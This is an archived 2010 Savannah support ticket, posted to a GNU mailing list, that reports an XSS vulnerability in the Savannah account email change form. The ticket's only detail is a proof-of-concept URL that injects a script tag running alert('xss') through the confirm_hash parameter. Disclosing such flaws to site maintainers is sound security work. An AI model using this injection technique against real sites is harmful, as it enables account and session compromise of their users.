|
From: | Matt McCutchen |
Subject: | [Savannah-help-public] [sr #107282] XSS in account email change form |
Date: | Wed, 24 Feb 2010 23:39:21 +0000 |
User-agent: | Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100220 Fedora/3.6.1-1.custom.fc12 Namoroka/3.6 |
URL: <http://savannah.gnu.org/support/?107282> Summary: XSS in account email change form Project: Savannah Administration Submitted by: hashproduct Submitted on: Wed 24 Feb 2010 06:39:20 PM EST Category: Savannah website Priority: 5 - Normal Severity: 6 - Security Status: None Assigned to: None Originator Email: Operating System: None Open/Closed: Open Discussion Lock: Any _______________________________________________________ Details: https://savannah.gnu.org/my/admin/change.php?item=email&confirm_hash=%27%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&step=confirm _______________________________________________________ Reply to this item at: <http://savannah.gnu.org/support/?107282> _______________________________________________ Message sent via/by Savannah http://savannah.gnu.org/
[Prev in Thread] | Current Thread | [Next in Thread] |